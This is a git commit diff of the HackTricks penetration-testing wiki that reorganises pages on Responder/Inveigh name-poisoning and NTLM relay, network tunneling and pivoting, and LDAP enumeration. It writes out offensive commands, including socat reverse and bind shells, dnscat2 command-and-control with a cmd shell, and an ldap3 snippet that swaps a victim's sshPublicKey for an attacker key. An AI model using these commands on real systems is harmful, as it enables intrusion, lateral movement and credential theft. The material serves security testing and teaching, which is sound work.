GitBook: [#3560] No subject

This commit is contained in:
CPol 2022-10-05 00:11:28 +00:00 committed by gitbook-bot
parent 714393c0a0
commit 1b08cbcba9
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
17 changed files with 404 additions and 450 deletions

View file

@ -196,6 +196,8 @@
* [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md) * [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
* [Skeleton Key](windows-hardening/active-directory-methodology/skeleton-key.md) * [Skeleton Key](windows-hardening/active-directory-methodology/skeleton-key.md)
* [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md) * [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md)
* [Windows Security Controls](windows-hardening/authentication-credentials-uac-and-efs.md)
* [UAC - User Account Control](windows-hardening/windows-security-controls/uac-user-account-control.md)
* [NTLM](windows-hardening/ntlm/README.md) * [NTLM](windows-hardening/ntlm/README.md)
* [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md) * [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
* [Lateral Movement](windows-hardening/lateral-movement/README.md) * [Lateral Movement](windows-hardening/lateral-movement/README.md)
@ -205,8 +207,6 @@
* [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md) * [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md)
* [WinRM](windows-hardening/ntlm/winrm.md) * [WinRM](windows-hardening/ntlm/winrm.md)
* [WmicExec](windows-hardening/ntlm/wmicexec.md) * [WmicExec](windows-hardening/ntlm/wmicexec.md)
* [Windows Security Controls](windows-hardening/authentication-credentials-uac-and-efs.md)
* [UAC - User Account Control](windows-hardening/windows-security-controls/uac-user-account-control.md)
* [Stealing Credentials](windows-hardening/stealing-credentials/README.md) * [Stealing Credentials](windows-hardening/stealing-credentials/README.md)
* [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md) * [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)
* [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md) * [Mimikatz](windows-hardening/stealing-credentials/credentials-mimikatz.md)

View file

@ -4,11 +4,15 @@
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
@ -786,10 +790,14 @@ The MBR holds the information on how the logical partitions, containing [file sy
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -39,19 +39,18 @@ Responder automates the WPAD attack—running a proxy and directing clients to a
> >
> The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. > The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.
* [**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in **`/etc/responder/Responder.conf` ** (here you can disable rogue servers) [Responder](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_
* **Responder** will **print hashes out on screen** and **write** it to a **log** file per host located in the `/usr/share/responder/logs` directory. Hashes are saved in the format `(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt`
* You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)
* Responder works in **ipv4** & **ipv6**
#### Responder Params You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)
Responder supports the following options: > Responder works in ipv4 & **ipv6**
Options are the following :
``` ```
--version show program's version number and exit --version show program's version number and exit
-h, --help show this help message and exit -h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS, -A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding. BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0 -I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a Network interface to use, you can use 'ALL' as a
@ -64,55 +63,35 @@ Responder supports the following options:
-e 10.0.0.22, --externalip=10.0.0.22 -e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than Poison all requests with another IP address than
Responder's one. Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM -b, --basic Return a Basic HTTP authentication. Default: NTLM
-r, --wredir Enable answers for netbios wredir suffix queries. -d, --DHCP Enable answers for DHCP broadcast requests. This
Answering to wredir will likely break stuff on the
network. Default: False
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response. option will inject a WPAD server in the DHCP response.
Default: False Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP -D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added. response, otherwise a WPAD server will be added.
Default: False Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is -w, --wpad Start the WPAD rogue proxy server. Default value is
False False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port) outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default: retrieval. This may cause a login prompt. Default:
False False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be authentication for the proxy. WPAD doesn't need to be
ON. This option is highly effective when combined with ON. This option is highly effective when combined with
-r. Default: False -r. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and --lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False earlier. Default: False
--disable-ess Force ESS downgrade. Default: False --disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity. -v, --verbose Increase verbosity.
``` ```
<details>
<summary>Responder Params</summary>
* The `-A` flag puts us into **analyze mode**, allowing us to see NBT-NS, BROWSER, and LLMNR requests in the environment without poisoning any responses.&#x20;
* We must always supply either an interface or an IP.&#x20;
* `-wf` will start the WPAD rogue proxy server
* `-f` will attempt to fingerprint the remote host operating system and version
* Use the `-v` flag for increased verbosity (a lot of additional data printed to the console)
* Options such as `-F` and `-P` can be used to force NTLM or Basic authentication and force proxy authentication, but may cause a login prompt, so they should be used sparingly.&#x20;
* The `-w` flag utilizes the built-in WPAD proxy server. This can be highly effective, especially in large organizations, because it will capture all HTTP requests by any users that launch Internet Explorer if the browser has [Auto-detect settings](https://docs.microsoft.com/en-us/internet-explorer/ie11-deploy-guide/auto-detect-settings-for-ie11) enabled.
</details>
#### Running Responder
To run default Responder behaviour you only have to execute: To run default Responder behaviour you only have to execute:
```bash ```bash
responder -I <Iface> #Default conf responder -I <Iface> -Pv
responder -I <Iface> -P -r -v #More chances but might break things
``` ```
An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows-hardening/ntlm/#ntlmv1-attack)**.** An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows-hardening/ntlm/#ntlmv1-attack)**.**
@ -138,7 +117,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs` The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
#### Responder - DHCP Poisoning ### DHCP Poisoning
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
@ -152,7 +131,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
./Responder.py -I eth0 -Pdv ./Responder.py -I eth0 -Pdv
``` ```
#### Responder - Capturing credentials ### Capturing credentials
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**): Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
@ -164,23 +143,11 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. > Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\ [**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero). Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png) ![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
Or run it with more options:
```powershell
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
```
Or run the C# version:
```bash
Inveigh.exe
```
## NTML Relay Attack ## NTML Relay Attack
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**. This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.

View file

@ -202,6 +202,22 @@ rportfwd_local [bind port] [forward host] [forward port]
rportfwd_local stop [bind port] rportfwd_local stop [bind port]
``` ```
## Windows netsh
### Port2Port
You need to be a local admin (for any port)
```bash
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
# Check the port forward was created:
netsh interface portproxy show v4tov4
# Delete port forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
```
## reGeorg ## reGeorg
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
@ -220,19 +236,16 @@ You need to use the **same version for client and server**
### socks ### socks
```bash ```bash
./chisel server -p 8080 --reverse #Server -- Attacker ./chisel server -p 8080 --reverse #Server
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim ./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
#And now you can use proxychains with port 1080 (default) #And now you can use proxychains with port 1080 (default)
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker
``` ```
### Port forwarding ### Port forwarding
```bash ```bash
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
``` ```
## Rpivot ## Rpivot
@ -268,7 +281,7 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
```bash ```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337 attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
``` ```
### Reverse shell ### Reverse shell
@ -281,13 +294,13 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
### Port2Port ### Port2Port
```bash ```bash
socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> & socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
``` ```
### Port2Port through socks ### Port2Port through socks
```bash ```bash
socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
``` ```
### Meterpreter through SSL Socat ### Meterpreter through SSL Socat
@ -351,53 +364,6 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
``` ```
## Windows netsh
### Port2Port
You need to be a local admin (for any port)
```bash
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
# Check the port forward was created:
netsh interface portproxy show v4tov4
# Delete port forward
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
```
## SocksOverRDP & Proxifier
You need to have **RDP access over the system**.\
Download:
1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
```bash
# Load SocksOverRDP.dll using regsvr32.exe
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
```
Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary:
```
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
```
Now, confirm in you machine (attacker) that the port 1080 is listening:
```
netstat -antb | findstr 1080
```
Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
## Proxify Windows GUI Apps ## Proxify Windows GUI Apps
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\ You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
@ -457,29 +423,14 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
### DNSCat2 ### DNSCat2
****[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
Establishes a C\&C channel through DNS. It doesn't need root privileges. Establishes a C\&C channel through DNS. It doesn't need root privileges.
```bash ```bash
attacker> ruby ./dnscat2.rb tunneldomain.com attacker> ruby ./dnscat2.rb tunneldomain.com
victim> ./dnscat2 tunneldomain.com victim> ./dnscat2 tunneldomain.com
# If using it in an internal network for a CTF:
attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
victim> ./dnscat2 --dns host=10.10.10.10,port=5353
``` ```
#### **In PowerShell** **Port forwarding with dnscat**
You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
```
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
```
#### **Port forwarding with dnscat**
```bash ```bash
session -i <sessions_id> session -i <sessions_id>
@ -509,28 +460,11 @@ Root is needed in both systems to create tun adapters and tunnel data between th
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
``` ```
### ptunnel-ng
****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
```bash
# Generate it
sudo ./autogen.sh
# Server -- victim (needs to be able to receive ICMP)
sudo ptunnel-ng
# Client - Attacker
sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
# Try to connect with SSH through ICMP tunnel
ssh -p 2222 -l user 127.0.0.1
# Create a socks proxy through the SSH connection through the ICMP tunnel
ssh -D 9050 -p 2222 -l user 127.0.0.1
```
## Other tools to check ## Other tools to check
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
<details> <details>

View file

@ -74,74 +74,9 @@ phone: 23627387495
* Lines 10-16 define 2 organizational units: dev and sales * Lines 10-16 define 2 organizational units: dev and sales
* Lines 18-26 create an object of the domain and assign attributes with values * Lines 18-26 create an object of the domain and assign attributes with values
## Write data ## Basic Enumeration
Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**. ### Manual
```bash
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
## Sniff clear text credentials
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
## Anonymous Access
### Bypass TLS SNI check
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
### LDAP anonymous binds
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \
However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
## Valid Credentials
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
## Enumeration
### Automated
Using this you will be able to see the **public information** (like the domain name)**:**
```bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
```
### Python
<details>
<summary>See LDAP enumeration with python</summary>
You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3` You can try to **enumerate a LDAP with or without credentials using python**: `pip3 install ldap3`
@ -182,26 +117,63 @@ True
>>> connection.entries >>> connection.entries
``` ```
</details> ### Automated
### windapsearch Using this you will be able to see the **public information** (like the domain name)**:**
[**Windapsearch**](https://github.com/ropnop/windapsearch) **** is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries.
```bash ```bash
# Get computers nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
``` ```
### ldapsearch ## Write data
Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you **can change the "sshPublicKey" information** of your user or any user. It's highly probable that if this attribute exist, then **ssh is reading the public keys from LDAP**. If you can modify the public key of a user you **will be able to login as that user even if password authentication is not enabled in ssh**.
```bash
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
```
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
## Clear text credentials
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
Also, you can perform a **MITM** attack in the network **between the LDAP server and the client.** Here you can make a **Downgrade Attack** so the client with use the **credentials in clear text** to login.
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
## Bypass TLS SNI check
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
```bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
```
## Valid Credentials
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
```bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
```
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
### Manual
#### ldapsearch
Check null credentials or if your credentials are valid: Check null credentials or if your credentials are valid:

View file

@ -294,7 +294,12 @@ Commands:
### Domain Shared Folders Search ### Domain Shared Folders Search
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)**** * [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
* Or [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
```bash
